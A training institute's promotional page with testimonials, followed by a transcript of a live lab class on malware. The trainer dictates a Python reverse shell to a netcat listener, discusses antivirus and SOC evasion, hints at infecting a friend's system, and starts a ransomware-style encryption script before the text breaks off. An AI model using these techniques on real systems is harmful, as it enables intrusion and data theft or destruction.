Welcome to the dynamic learning hub of XLR at Andheri East. A prime spot conveniently located at just a 5-minute walk from LIC Andheri Metro. In our journey of over a decade, we have proudly trained over 2 lakh students. We have also been recognized by Deloitte, Silicon India, and other accreditation bodies. Experience learning like never before in our spacious and comfortable classrooms. With high-definition projectors and state-of-the-art acoustics in place, we ensure effective learning even to the farthest point in the room. The hybrid mode is a game changer as you can enjoy the benefits of a live classroom from the comfort of your home. Even if you happen to miss any classroom session, you can still attend the same session with the same trainer at the same time at your convenience, maintaining consistency in your learning progress. Wanna get started? Join us for a demo or career chat over a cup of coffee at our Andheri branch. XLR. We don't just train, we build careers.
Yes, so the collaboration with XLR was an excellent one. We conducted a Power BI workshop with Advanced Excel over a span of 3 days. The workshop was almost 12 hours long in total. Mr. Karthik, who was an amazing trainer, helped the students understand the concepts deeply. I am sure that the students will be able to apply these concepts in their careers as well as their daily lives.
The trainer, Mr. Karthik, was an excellent person where he explained in very detailed manner on how to give great insights using very complex data sets.
So it was a machine learning workshop. We learned a lot from the course and it was a great experience attending the workshop.
The trainer was very helpful. He had a hands-on approach with his teaching and it was fabulous.
This was a great experience for me. So I would absolutely love it if XLR and its team would come again to our campus and conduct more events like this.
It was a great course and it started from basics and took me to a great extent.
The experience of the workshop was really nice. The feedback from all the students was positive. They understood the concept. The workshop was also practical based with some questions. The experience with XLR was very smooth. They helped us in conducting the workshop smoothly right from the booking of the vendor and deciding the course till the distribution of certificates. In overall, this workshop was a success during our Technical Fest Atmos, and I thank XLR for being a part of it.
was very much interested in learning digital marketing course for a very long period of time, but I don't get a proper platform. So later for my college, I get to know about XLR and I enrolled in XLR course. It was really good experience. Our course has been taken by Mayur sir, and he was very good teacher. He not only focusing on theory part, he is doing how real digital marketing works, and it was in total very good experience. I get so much of knowledge. Here they not only focusing on study, they are also conducting different exam to test our knowledge, and as we are giving the exam, so to appreciate our work, they give certificates for the toppers, and along with the certificate they give hampers. Thank you, XLR.
Recently, I was searching for digital marketing courses online in Google, and I came across XLR, and I attended a digital marketing course which was for 15 days. My mentor Mayur helped me for attending these classes. So he is a very informative and helpful guy. In the course end, there is a exam which I topped, so I came to the XLR office in Bengaluru. This digital marketing course has helped my career and my skills to develop, and the certificate has helped my company to join. Thank you, XLR.
I came to know about this course from my college. Actually, for learning platform, this is very nice, and I learned from here ChatGPT and AI from online. Vikas is teaching for me for AI generative and ChatGPT. We are using this technology in more. And after finishing the courses, I came from for collecting the certificate. I seen the classrooms and faculties. Classroom is very nice. After the completion of exam, they will give gift and certificates. Thank you, XLR, for giving these courses. I learned a lot from this. I gained the more knowledge from here. And thank you for XLR for teaching us.
Hello guys, I'm Vikram Mahajan and I'm studying in Swami Vivekananda Institute of Technology College, and I came across a training program which was mobile app development using Flutter, which was given to us by XLR Solutions. I came across this program through my college faculty, who told us about this program, that it is a very good course and you should enroll in this course. So I enrolled in this course, and initially I felt really good about this course because they started everything from a very basic point of view, that even if someone who doesn't know anything about Flutter or anything about mobile app development can also learn the same way the ones who know about it are learning. So no student was left behind and everyone was given equal attention. All the doubts throughout the course were cleared. And if we had any questions also, we were like, the trainer was also ready to stay for a longer time than it was scheduled, even for the sake of doubts. So that shows how important the students are to them. So it was a really good experience with XLR's program, and by the end of the training program, I was able to develop my own application. And through the development also, there was another point. So our sir taught us about how we can connect our own mobile phone to our laptop and write code in our laptop, and you can see the output in your phone, which is really creative and interesting for me. I felt really good about that. So in the end, I developed my own mobile application. I showed it to my mother, I showed it to my friends. I felt really good about it. So I would really suggest XLR. I would recommend it to all my friends to take courses from here, as they focus on the children, focus on the students, and they focus on what's necessary, that is the students' doubts gets cleared and everything else. So today I came down to the XLR office to collect my certificate. So I got to know about what other courses XLR is offering. It included data analysis, data analyst, social media marketing, and full stack Java, and many more courses which were interesting, and they gave us an insight of how everything happens, and they take you through the course from the starting of the course to the end, and what next, that is placements as well. How you should be going into the interviews and how you should be approaching to companies, your resume building, and there were so many things which XLR is going to help you in, and they are ready to give you all the knowledge required even if you are a beginner. So I really felt good about this visit, and I would really recommend XLR to everyone who's listening to this, and also to all my friends, that I had a very good experience with XLR, and I would suggest you to experience the same. Thank you.
Hello everyone, my name is Satish and I am from Swami Vivekananda Institute of Technology. I am here to share my experience about XLR program. I took part in the XLR program that was conducted in the last month about the mobile app development using Flutter. What I liked the most about this session was the trainer started from the scratch. That means even the beginner who don't know about the basics of the program, even they can learn the most from this program. It gave me hands-on experience by developing a project which was the final outcome. Thank you XLR for giving me this opportunity, and I would also recommend all my friends to take part in the XLR programs. Thank you.
Hello everyone. My name is Tasneem. I'm the senior manager at 98 percentile in the HR department. And today we did a wonderful drive with XLR. It was amazing right from the very beginning, from the very first day when I got in touch with them till today. I think it was an extremely smooth journey with them. There were multiple follow-ups done by the representatives in order to check that we would be, what time we would be coming, how many people would be coming, what vehicle we would get. To that extent, they were so precise in giving all the information to us. It was extremely great to get associated with them and have a drive at XLR campus. So we are very, very happy that we got a chance to do this. Now, coming to the students, what XLR had, I think they were extremely enthusiastic. They were well prepared. They were aware of what they are coming for. I think there was some back-end preparation which they did that was commendable. They also were very confident, and they were open to any kind of thing we were asking them to do. That was I think the best part. Now, I really hope we have a very, very fruitful association with each one of them and XLR in future. We are really looking forward to have many more drives.
Yeah, good evening, sir. You can start the class now, sir.
Uh, yeah, yeah. Hi, everyone. Good evening. Just give me 1 minute. I'll just share my screen. Just give me 1 minute. I just got hanged. Just 1 minute. Yeah. Just let me know if once my screen is visible. And today the topic we're going to cover. I hope my voice is audible for everyone, right? Yes. Okay. Okay. Then good. Right. Just give me 1 minute. I'll just check my Kali Linux. Yeah. So actually today we're going to see about malwares and how to create a malwares, what are the types of malware and how we can work with the malwares. That everything's we're going to see today. And in that topic, we'll just see how we can write our own malware, everything. I mean, malware in the sense it's not a complete malware. Where I'll just show you like us using some programming language, how we can able to create a reverse shells and everything we'll see today. Okay. So before that, I'll just turn it on my Kali.
Yeah. So now first we'll see what is the actually malware. Okay, so malware is nothing but so there are different types of virus are there. Okay, so the common way name we say it as malware. It may be a like a Trojan virus, or else it might be a adware, or maybe a spas. I mean, what is a worm virus, or else normal virus, ransomware, rootkit. So it's whatever the virus it will be. So okay, the common name we say it as malware. Okay, so I mean, in real time, if you ask me that, okay, is that malware can be help me to take the control of the system? Yes, it will help you to take the control of the system because few of them may can ask me that, okay, in real time there will be a antivirus, there will be a what to say, so many anti-malware detection system they will implement. Even how can we get the access of the server with the help of malware? So in real, I mean if it is not a organizations, if it is your friend system, that will be easy. Okay, so simply we can create some publicly available malware. Okay, and we can send it to that your friend system. Once your friends execute that malware, so then based upon your instruction, the malware will react on the target system. So where based on our instruction, in the sense I try to say that there is a different types of malware already I told you, right? So like a malware, virus, worm. Then we have a spyware. Then ransomware, rootkit. So this and all the different types of malware. Even we have so many things, but this and all the major malwares. Okay, so we have so many malwares type, but this is the major one. Okay, major malwares like virus, worm. Each and every type of malware have a different behavior and different character. Okay, so I mean mostly when we are creating this virus, right? So the antivirus will detect based upon the behavior, character, and signature. There are so few things. Okay, so with the help of that, the antivirus and malware, anti-malware systems are trying to detect whether it's a suspicious file or else it's a genuine file. With the help of that, it's trying to figure it out. But in real time, if you ask me that, okay, how we can use this malware in real time? Okay, in real time, anyhow, so in organization, they will provide you the IP, okay, to perform the PT for that particular system. It may be any system, okay, it's like a Windows, or else it may be a Linux, it may be any system, okay, they'll just provide you the IP address. Okay, so for that IP, we need to perform the PT. Okay, sometimes what happen when you are coming to the PT or teaming activity, so you have some chance, okay, you know that, okay, so with if I bypass this specific way, I can able to get the access of the system. Okay, you know that, but you feel that, okay, that place I need to inject some malware, then only I can able to get the access. Okay, so in that point of time we can able to create a malware, but we need to write our own malware. We can't able to use the publicly available malware because yeah, I mean, when they are, I mean, it's if it is an organization, right? Sure, they will implement some anti-malware scenarios, and with that can find figure out that type of anti-malware easily detect that. Okay, so first like a signature. Okay, so why if it is a common signature, right? So it will detect. Okay, so you can ask me that how they are detecting. I mean, how that anti-malware systems are detecting that signature, because when once if you when you try to inject some malwares into the target system, right? What that anti-malware detection will do first, it will take that file and it will do some sort of scanning. So when while doing the scanning, it's try to find out the signature and hash value of that file. Then I mean, some sort of anti-malware system can able to read, okay, what type of code you have written inside that, because so if you see API malware, so there is some sort of chart sheet. So, okay, so this and all the functions, you can take this and all the functions. Okay, so when you are writing some sort of malware writer, so mostly what we do, we take some function from this scenarios. Okay, so like if you want to do enumeration, injection, evasion type of scenario, spying, or else internet, so or else if you want to create some ransomware based files, so mostly we'll use this type of functions to create that file. Okay, so where that anti-malware system detection system, what it will do, it will try to find out what sort of code we have written inside that particular applications, and it will try to figure out, so is that we use this sort of API functions. Okay, if we use this one, right, then automatically that file, I mean that anti-malware detection system say that this is the malicious file. Even sometimes you see that even if it is not a malware file, so if you install some normal application also, sometimes it will say that okay, this is the malware. Okay, sometimes it say the malware. Okay, because when it's tried to scan that application, right, it's tried to I mean it's point out some files, some functions from this. That's why it's saying that it is a malware file. Okay, so what we need to do when we try to write a malware, we need to bypass this everything. Then only you can able to I mean take your malware inside the system. Okay, then only you can able to get the access. But here we have a one more challenge, like whenever you want to inject the malware, right? So we need someone to execute that malware from this server side. Without executing that malware, right? So we can't able to get the access, or we can't able to make the malware active. So based upon your instruction, the malware will not work. So someone needs to execute that malware file from the target system. Okay, so we have so many scenarios like this. Okay, so we'll see one by one. So before getting into this top site type of scenarios, right, first we need to get better understanding about malwares, and how we can able to create a malware, and how we can detect the malware. So once we know how we can detect and how the basic firewalls are trying can be detect that malwares, right, then only we can understand the scenario how we can bypass that. Without creating and bypassing, I mean detection scenario, we can't bypass it. So first what we're going to do, we're going to understand about the malwares. Okay, so mostly in real time, the malware will be like a ransomware, or else a Trojan virus. Okay, or else rootkit. So you can say that why this type of virus are not affecting the system. So there is a systems affected by those type of malwares. The I mean, which are the top three malware. I mean the topest three malwares. But mostly in the I mean students based system. It's not like a enterprise level. Okay, so the reason is like mostly this type of virus will be in the cracked applications. So whenever we try to download some crack applications, right? Because mostly students will try to download full versions. Okay, they don't want to pay some amount to get the full version. So that what they will do, they try to get some crack version from the internet. Okay, so that time what happened, right? So that crack version is also a type of malware. Okay, so when you try to install some that type of application, right, a crack application, what happened? Sometimes there is a virus or else worm virus. Spyware there is very less chance, but virus and worm virus there is a chance. Okay, because they can't give you that everything in the free of cost. Okay, so they need something. Okay, at least they need your data, at least they need some things, then only they can able to provide in the free of cost. Okay, or else name. Okay, without anything nobody will give that just like that. Okay, so you can ask that, okay, after download also my systems are working fine. There is no problem. Everything's are working fine. Yes, it will work fine. But if it is a virus or else if it is the worm virus, right, what happen? It will take so many days, okay, to find figure out. Okay, my system got affected by the virus or worm virus because so virus. I mean, if you are running Trojan or ransomware, right, it will react that time itself. Okay, if it is a ransomware, what happened? So your entire system will get encrypted, and if you want to take that back, I mean, take that system to normal, right? So you need to install some sort of decryption key, then only you can get it to the normal. Okay, so it will affect in fraction of second, but virus and all not like that. So, for example, you already created a virus. Okay, so you are sending this virus to the target system. Once you run this, right, it will not affect that entire system. First, what it will do, it will just sit near to, I mean, affect the nearby applications. Okay, so whenever you try to open that nearby applications, right, I mean that applications, it will like keep on. It's like a chain reaction. It will go to the next file. It will go to the next file. It's like a chain reaction. So once the chain reaction reach some amount of level, right, then your system will react that, okay, there are some sort of virus. Okay, so likewise only we can able to predict. Sometimes what happen, even if you connect some pen drives or something, right, so there is a chance sometime it will affect the entire system very fast, but mostly it will take time to affect the system. Okay, so that is the virus. So worm virus in the sense, it will slow down your system. In the name itself, we can understand that. Okay, so worm. So worm will move very slow. So thus, the virus also work like that. So that virus will affect you, make your system to run very slow. Okay, that's a difference between virus and worm. So viruses like make the application files shortcut, or else it will make the um, overflow your memory. Overflow in the sense, so you don't have that much of files in your D drive. Okay, you have, for example, you have only 10 GB of file. Okay, actual GB will be 10 GB. That virus will make your system 40 GB, 50 GB. It will the virus of take the for 30 GB of space. And it will sometimes what happen, if it will try to overflow your memory, then what happen, if you try to open your system, it will get slow, or a little it will simple things of malware with a virus will be like damaging the applications, damaging the files. That is the scenario of virus. But if you are using the worm, right, so it just make your system down. Okay, so when you try to access some files, it will to open that files, it will take too much of time. Okay, so to create a virus and all, there are so many applications in the real time. Okay, but if you use that application, sure, anyone can I mean, any anti malware or antivirus can able to detect. Okay, so for that we need to write our own code to create a virus. Okay, the reason I show you, right, the why it's getting detected very fast because of this scenario. Okay, anyhow, we'll take some sort of functions from here to create a virus file. Okay, so we need to avoid this. I mean, actually, we can't avoid this sort of files. We need to do some authentication technique, or else we need to do some encryption techniques, XOR encoding. Some things we need to implement inside the code to make I mean to show that, okay, this is like a genuine file. Because when the anti-malware try to find right, so we need to mask that original and we need to show something fake. Okay, then only we can able to bypass that anti-malware. Own code of virus, you need to write your own script level. Okay, you need to use your programming knowledge to create a virus. Okay, so then only we can able to bypass the antivirus or anti-malware. To create a virus and all, we can go with Python, or else you can go with C. There are so many programming language we can to create. Okay, I'll just show you some basic, but I'm not sure going to show you how to create a virus, but I'll show you how you can how what are the libraries files can be help you, that type of things. Okay, just give me, I'll try to open my VS Code. Okay, so now what I'm going to do, I'm going to create some basic what to say. Okay, I'm just going to use the Python code to encrypt some file. Okay, so I'm going to show something like a ransomware. Okay, because if you see here, I just explained this three different types of virus, right? So and okay, I'll just complete the explanation of Trojan, ransomware, and rootkit. Then I'll show you the practical. Okay, so then Trojan virus, everyone will know that. Okay, once this file got executed on the target, so we get the access of the remote access of the target system. Okay, ransomware will so once you execute, the entire files got encrypted. If you want to decrypt that file, you need to pay some money. Then only that attacker will provide you the decryption file. Then only you can be able to get the data back. But mostly in ransomware, we have two different types of ransomware. One is like online based, second thing is like a offline based. If it is a online based, at least there is a chance you can able to save you some sort of files. Okay, the reason will be so if that system got connected with the internet, then only that ransomware will get work actively. Otherwise the virus will be inactive. Okay, that's the scenario. Once the virus got affected, right, if you unplug from that system, if you unplug the internet from that system, there is a chance you can able to save your data. Only if it is a online based. Suppose if it is a online offline based ransomware, right, there's no chance. So we need to uh, the entire we can't able to get any data. The entire data will get encrypted. But there is a chance you can able to retrieve that data back if it is a offline. If it is a online, it's very hard to retrieve the data. Okay, that is a difference between this. Okay, but mostly we have more than 300 plus different types of ransomware. Okay, so then the rootkit. So rootkit is once if before sending some virus or something to the target system, right? If you send the rootkit to the target, what happened? The rootkit will disable all the antivirus and firewall. Okay, so after that, if you send you a virus file to the target, right? So what rootkit will do? Rootkit will support your virus file to keep inactive. Okay, so rootkit will not make the your virus to detect by any firewall or else any antivirus. So it will give some protection to that virus file. It's a simple thing. Okay, it will twice the power of that malware file. Okay, so that is the different, uniqueness of each and every malware. But now I will show you how we can able to write some program. Okay, so first I'll show you the Trojan based, how we can able to run create Trojan files, and I'll show you how you can able to create ransomware based files. Okay, then easily you can understand. So for that, I'm going to do, I'm going to use some sort of Python code. So even if you know, if you have knowledge on Go or C sharp, any other language, you can go with that. That's not a problem. Okay, so in cybersecurity we can't say that okay, only you should use this programming language to work with complete scenario. You can work with any, you can prioritize any language. That's not a problem here. Just give me a minute. I'll just okay. So I'll just Kali. Okay. So I'll just open my one more system. This Kali, I'm going to use it as the attacker system. Okay. So and I'm going to use my one more system as a target. Okay. So I just use that, both are the Linux system. Okay, so I'll show you how to write the code for Linux and how to write the code for Windows. There is a slight change. Yeah, this is the system I'm going to use as my target. Okay, so just first I'll log in here. Okay, so first I'll show you how we can inject, run the script directly on the system. Then I will show you how you can able to send some file without interacting, interacting with that target system. Okay, so we'll just go one by one. Okay. Okay. Okay, Nano. I'll just check that Python -v. Yeah, so the system have Python, so no problem. So BIM space shell.py. Okay, so now I'm going to write some Python script here. First, I need some library file because that library file will help me to interact with my target system, and some library will help me to send the data over the network. Okay, so for that, I am going to use three different library files. One is like import socket. Okay, this socket library will help me to, sorry, import socket. Okay, so this is one of the library. This will help me to send the data over the network. Okay, for that I'm going to use the socket. So then I have one more library file, sub process. Okay, this sub process will help me to I will give some sort of command right over the network. I'll just from Kali I'll just give ls or some commands. Okay, so that command will interact with this system, then I will get a response back. Okay, to run the command in this system, right? So over in the terminal, for that I'm going to use the sub process library file. Then OS, so like I need complete interaction of the operating system. Okay, for that I'm just using OS. Then I'll just use s equal to socket. Socket. This function will help me to create a new socket. Okay, new socket in the sense new connections. Okay, so then I'm going to use socket. Oh, what happened? Okay, socket.af underscore internet. INET. Okay, this is already a functions. Okay, this command will help me to say that okay, I'm going to use IPv4 to interact with the different system. We have a IPv4 and IPv6. So when we are, because when we create a malware, right, we need to feed some data for that malware. Okay, data in the sense, so once someone execute you in the target system, right? So after that, what you need to, as per the my instruction, you need to react. So my instruction is like once someone execute on the target, so you need to send the data back to my system. Okay, so it means because I'm that a hacker, right? So I need to get the connectivity to back to my system. Okay, so for that, what I am saying in Socket program, AF underscore INET is like a IPv4. So to transfer the data over the network, I can use two different IP. One is like IPv4 or else IPv6. IPv4 is enough to transfer the data over the network. Okay, so I'm saying that IPv4 I'm going to use. Okay, then Socket dot shock score stream. Okay, it's like a TCP connection. So mostly what happened. Okay, so whenever you are interacting with the internet, right, we need two things. One is like IP address, then another one is like a port number. Okay, because IP address is like a address. If you want to reach someone system, right? So the IP address will help you to reach the system. So after reach the system, if you want, what sort of service we are trying to request, right? That is called port number. It's like a door. In system, there are so many service will be available. So we need to say that okay, instead of entire service, I need only specifically this service. Okay, so to point out some specific service, there is a port number. For a website, there is a port number called 80. For email receiving, there is a port number called 110. For email sending, port number 25. So there are for each and every service there is a separate port number. Okay, without port number, we can't able to interact in the internet. Okay, so for each and every service there is a unique port number. Okay, same like for our service, we are going to create separate unique port number, and I'll tell you that okay, which port number we need to use to do the communications. Okay, so after this, what I'm going to do, as per the scenario, I'm just going to give the IP address and everything. S dot connect. Okay, so the connection should be like once someone execute this code, right? So that data, that information should go to the Kali. Okay, so the Kali IP is like IP will be, just give me a minute, I'll just check the IP. If config, so this is the IP 192.168.31.154. This is the actual IP. I need to give that 192.168 dot what is the IP? 31.154. Okay. 31.154. Okay, so this is my actual IP. Okay, so then I'll just give the port number 1234. So why I'm giving 1234 port number, because for example, the reason why I'm giving this, in the target system, there are so many service can be run. Okay, so even I don't know what service they are using. Okay, so there's a chance of a website, database, or else they can run for some FTP service to storage some data and to, or else transfer the data over the internet. There are different service can utilize in the target system. Okay, so mostly that informations, what to say, so mostly that service and all run under 1024 port 0 to 1024 port numbers. Okay, so if I use more than 1024, right, so then that I port number will not use for any other service. So peacefully that port can I use for my specific service. Okay, that's why I'm just giving 1234 port number. Okay, so then I'll just give OS dot. OS dot I forgot the 1 second. I just forgot that. Yeah, DUP2 as dot file number, comma 0. Okay, so I'm just giving this because so whatever you type in the keyboard, right input. Okay, so that's sent to the attacker. Okay, to get send it to the attacker, I'm just using this one. So then OS dot DUP2 s dot file envo 1. um, it's like a success output. This one is for success output. Then DUP2 s dot file. Okay, so if there is any error, so the attacker come to know, okay, the connection time mode or some errors, whatever the error may be. Okay, even if that command is wrong, so whatever it is, so we'll get that output. That error. Okay, so simply 0 is like a input, 1 is like a output, 2 is like a error message. Oh, yeah, there's a spelling mistake. Okay, thank you. Just 1 minute. I'll just check the entire code once again. Yeah. Now I'll just give the final line. Okay, P equal to sub process dot call. I mean, actually, this one is like, well, I mean, once the entire code get executed, right? So I need the shell access of that target system. Okay, so the shell access should be like, I need a sh shell access. So slash bin slash sh. Okay, I need this shell access. Sorry. Okay, so once I run this, right, just I'll shave this. Okay. Okay, now so ls shell dot py. So I'll just run this python equal to shell dot py. Okay, so before running this, right, I need to just turn on monitor on my target. I mean on my Kali system, because one I just want to enable the monitoring mode, because then only if someone execute that file on the target, right, then I'll get the connections. Like yeah, I'm going to use NC netcat NC space -ln VP space 1234. Let's see. 1234. I'll just run that script. Okay. So now if you see here, right, so it's just blinking the, I mean the cursor is getting blink. Okay. So if you, because the reason is like, if you see my system, Kali system, I got the access. Okay, but if you use this sort of commands, right? So whatever the code I have written on that, I mean server side, so that sort of code easily can be identified by the anti-malware system and easily attack. I mean, the defense team also able to identify that, because whenever you are running some files inside the system, right? Sure, they will maintain the what to say, logs. Okay, because if this is your target, right, so if this is your target, so sure it will be a, like a server. Okay, so the attacker will not just run the malware files in any normal system, because they know uh, they will do it for two things. One is like money based, or else they need give the take the data, and they want to make the target to face some losses, financial loss, or else something. Okay, trust problems. They need to, I mean there's some motive. Okay, so without motive they will not do any sort of attacks. Okay, so that times in that type of scenario, they'll not just run the virus on normal the server side, normal server system. They will just point out which system have the more sensitive data. They will just try to understand which system have the critical informations. Okay, so in that system only the attacker will try to inject the malwares, or they will try to do something. Okay, in that type of scenario, sure, even the in organization, the defense team will keep on monitoring this server, because they know uh, this server has so many sensitive data. So what they will do, they will use I mean the organization will create a SOC team, like a security operation center team. So this security operation center team will keep on monitoring this system. Okay, they'll just create one centralized system. Okay, and they'll just install that elastic search or some sort of software, say SEM tool. There are so many SEM tool. They will just install that SEM tool on the system. Okay, so with the help of that tool, this is, I mean the day, I mean they will monitor from this entire scenario of the system. Okay, even if how long you are ideal, what type of services you are running, even if you if there is any new ports got open, right, so easily they will find out. Okay, so you can ask me that how they can able to find that. Okay, because whenever I mean, that's the reason every 3 months they are doing vulnerability assessment. Every 1 year they are, every 6 months or 1 year they are doing the PT. Okay, while doing this, right, vulnerability assessment and penetration testing, so they will just remove the unwanted ports, unwanted service from the server side. Okay, if they see, I mean, once you remove that unwanted service or unwanted fraud port from the server side, sure, then I mean, entire defense team know that okay, these services are running, these services are already disabled. If they see something like, I mean, services in the sense, if you, for example, if there is a HTTP, right, this is the one of the service in this server. If I land some applications, this is the our HTTP, I mean, HTTP service will run in the target. If I am running database like MySQL, so then this server have the database service. Okay, so other than this, okay, other than this service, if there are any other new port numbers that get active, then easily they can figure out, okay, so how this port number got activated, and they will try to start analyze on that. Okay, actually, the main work of the SOC team is like, so they will keep on monitor and they will try to, I mean, what to say, find is the traffics in and out and what and all the applications are running, services are running. Is there is any suspicious activities are running? So they will try to find that. That is the actual work of this SOC team. Even if they see that okay, some file malwares are running in the target in this system, they will try to take that malware and they will do some deep analysis on that, and they will try to see is there is any I mean that data is going to whom, and they will try to find out so many things. Okay, this is the actual usage of SOC team. So that's why easily they can able to figure out. Okay, so there are so many different way. Okay, so but we need to bypass the SOC team as well, because when you are running in the real time, right, there will be a challenge. uh, Sometimes they will come up with like, okay, so just give me your IP, I'll whitelist your IP. So then my team know that okay, you are doing the PT, they will not disturb you. Okay, so that's a different scenario. Even if the traffics come from your name or your IP address, right, they will not disturb that, they will not block the traffic. Okay, and sometimes what happened that the organization itself, they will provide, give the they will ask, I mean, they will provide the give the challenge. Okay, my SOC team will work simultaneously. If we do any thing, if they my SOC team say see that if it is a suspicious activity, they will block the traffic. So we need to bypass the SOC team. Okay, the scenario will be like that. Okay, so if you have any doubts, you can ask me. So I'll just give you the 2 minutes of time. Okay, so then I'll just show you that one more code level scenario. So like ransomware based. Okay, just I'll just give you 2 minutes. But mostly in organizations, when you're I mean when you're doing the PT writer, so that time we can plan try for the Trojan based. Okay, because I need RCE of the system. So mostly the Trojan based application type of malwares and all will try only at the time of penetration testing, red teaming. Mostly we'll do in the red teaming. Okay, not even in the PT, because in PT there are so many restrictions. They will not what to say, they will not accept to inject the malware because what happened, mostly I mean when there is a penetration testing activity, right, the we I mean before starting the PT we just interact with the customer or we just interact with the client. Okay, that time we say that okay, don't give the production environment, because if it is the production environment, so when I perform the PT activity there is a chance, uh, even I mean there's a chance to modify some files, there is a modification of the files. Okay, the reason why we are saying that, because I know there is a way I can able to get the access once I do modification on that particular file. Okay, so if I do something that like that, right, sure they will the entire scenario will get affected and their real time scenario will also get affected. Okay, so that's the case. We are mostly will say that okay, don't give the production environment. Just create a one more environment like a UAT similar to that your production environment. Okay, so if they give that production environment system to perform the PT writer, so we can do whatever we want. Even if we do some changes on that file, also that will not affect their production. Okay, but mostly in PT activity, they will not create a UAT say, environment. They will give the direct production. Okay, that time what we need to do whenever you have a you find the point, right, so if I do modification on this file, then the entire system will get compromised. So in that time what we need to do, we need to interact with the client and we need to inform them. Okay, so there's a I mean if I do modification on this, I can able to do this type of scenario. If you give the permission, I can show you the live. We need to interact them, so without informing them we should not do that. Okay, so mostly this and all this type of scenario we need to uh, take care in the real time. Okay, mostly if you are when you're doing the web application based penetration testing, right, that time and all mostly they will give the UAT. Okay, but the when you're going in the network penetration testing side, that time you will not get UAT. Mostly it will be in the production. Yeah, I'll show you, but the same scenario will not work for all the time. Okay, the thing is like last time I mean okay, for the in first in first scenario in PT activity I show that. So with the help of that VSF TPD version, so with the help of this version I'll show you how to get the access, because for this specific versions we got an exploit from the Rapid 7. Okay, with the help of that we did. In next scenario we just try to exploit that HTTP service, but even though if it is outdated versions, um, we don't have any what to say exploit public CVE. So we what we did, we did some sort of deep enumeration and we found the uh, way to execute. So in the same way for MySQL, so I can show you some scenario, but the same scenario will not work help you for the entire activity, and sometimes so you will not get from the Rapid someone. So you need to read the CVE. Okay, I will show you in the next class maybe. Okay, so if you need to read the CVE based on the details, you need to create your own script or your own exploit. Okay, so every time I can't say that okay we'll get all the exploit from the Metasploit framework. Okay, so the scenario will be different. So if you go with the CVE, right, only 5 to 10% you can able to exploit, but other than CVE in real time, so even if you are planning for the red teaming, sure, it mostly 90%, 90 to 95 percentage, it will be like a misconfiguration. So complete misconfiguration you need to understand and you need to perform the red team activity. Even in PT also similar to the misconfiguration only. Okay, but I'll show you how to exploit MySQL. Okay. Okay, so I think no one had the doubts on this specific scenario. So I'll show you. Okay, so one more thing, like I mean ransomware based. Okay, so ransomware, we know that once you what to say, execute that file on your target, your entire system will get encrypted. Okay, so instead of encrypting the entire system, what I'm going to do, I'm going to focus on one file to perform the encryptions. Okay. I mean, the code which I have wrote right. So that same script will not help you for the Windows. Okay, for Windows, it's I mean, you need to do some small modification on that entire script because shell will be like mostly in the shell will be like what to say, only work for the Linux. Okay, so for Windows and all, it's like a PowerShell. We need to I mean, run the PowerShell to get the access. Okay, so that time, so we need to do some small modification on the script side. Okay, so I think I already have that script. I'll show you that. File open of see, yeah. So this is the actual what is it? Actual script. Okay, so for the Windows, I'll just run this. Okay, so Python space file dot py. So meanwhile, I'll just exit. Yeah, I'll just open one more monitoring service. Okay, so once I execute, see, so it shows connected. Okay, so now if I go to my Tally, right, now if you see dir, see, I can see all files, whatever the files in my Windows, I can see here. Okay, so I'll just show you my IP as well. IP config. Yeah, after connect to the system, right? So if you are using the Linux, you need to run the Linux command. If you have a Windows, you need to run the Windows command. Okay, so it will not something like graphical. Okay, in graphical mode, at least you have some scenario where you need to go, where you need to access some files. Okay, so but mostly in real time of attacks, so you'll not get the graphical scenario. Mostly it will be the CLI. Okay, even the graphical scenario will not help you. Uh, I mean, you can ask me that, okay, how I can able to even get the graphical mode. So only if that target have VNC or else RDP related service, then we can able to get the what to say, graphical mode. So otherwise, because if I use that service to connect with the target system, I will get the graphical like same scenario, same like this. Okay, like I can see all options, like Sika files, I can open file managers, everything. Okay, other than that, you will have only the CLI. Just 1 minute, I'll show you if I have that encryption ransomware based Python script with me. Because instead of typing it, if I open and if I can explain that right, I can easily complete that. That's why. Where is it? Where is it? Okay, I think I don't have that file. Okay, no issue. We can write our own file. So we go with this. I'll just open a new file. So crypto dot py. Okay. So first, what I'm going to do for the cryptography scenario, first I need to install this cryptography uh, file. Okay, then only I can able to um, what to say execute that entire program. Okay, and one more thing, what I'm going to do, I'm going to run that file in my Windows, sorry, Linux, because I'm using VirtualBox, right? Okay, there is an error. Okay, so sometimes what happen in Linux will get error like this. So easily we can overcome this. Like we need to create a virtual environment to run this, run some sort of library files. Okay, so I'll create a virtual environment here. Python 3 space hyphen m e. Okay, fine. So meanwhile, I'll just write my code. From So first, what I'm going to do, I'm going to import cryptography library file from the this one. Okay. So after this, what I'm going to do, I'm going to specify some files to encrypt. Okay. I don't want to affect my entire system. I'm just going to create some. I mean, mm, what to do? Okay, I'll just give some name of file. Okay, which file I want to encrypt. I'll just give the name of the file. So file underscore to underscore encrypt. Okay, so what I'm going to do, I'm going to give some file name here. So demo.txt. Okay, there's a file name called demo.txt. I'm going to encrypt this file. Okay, so then what I'm going to do, I'm going to create some key. Okay, the why I'm going to create a key, because with the help of that key only I'm going to encrypt that file. If there is no key, so I can't able to encrypt. Cryptography mostly work with the help of key based. Okay, so what I'm doing, key equal to, anyhow we have a one more class. I have cryptography. That time I will explain that uh, how you can able to use the encryptions, everything. I'll just show you that. Okay. Okay. So, and what I'm going to do, I'm going to save that key in the secret file. Sorry, again and again, same thing. Okay, so what I'm going to do, I'm going to save that key in the secret dot key. Secret dot key. Okay, secret dot key. Okay, then what I'm going to do now? So I just want to print that, I mean, just want to check that. So is the key got created or not? For that, what I'm going to do, I'm just going to insert some print statement. Mostly in the real time, the print statement will not comes in, because print statement is just like that to validate is that working or not. That's it. Okay. So print um secret key generated and saved as. So I'm just going to say secret dot key. Okay. Now I need class here. Okay. Then print key colon reason why I'm just giving this key dot decode, because so once I have the decode file, then only I can able to, what to say, again get back to that file into the normal. Okay. Then what I'm going to do, okay, so now what I'm going to do, I'm going to encrypt that file with the help of that created key. Okay, so which file I'm going to encrypt? I'm going to encrypt this demo.txt with the help of that key. Okay, so then so now what I'm going to do, I'm just going to open that file, okay, and I'm going to read that entire uh, data. So open the original files. I'm just, what I'm going to say, I'm just going to open the original file. So read it, or read all content. Okay, so in the binary mode. With open file underscore to encrypt. File dot read. So after that, what I'm going to do, I'm going to encrypt that all files, because then only no one can able to read that file. Okay, so after open, I just want to encrypt the complete file. Then only nobody can able to read that. So that's thing I'm going to do now. So encrypt equal to cipher dot encrypt original. Okay, so after encrypted, right, what I'm going to do, instead of saving in the same file, I'm just going to create a one more file in the name dot encrypted. Okay, so the extension will be 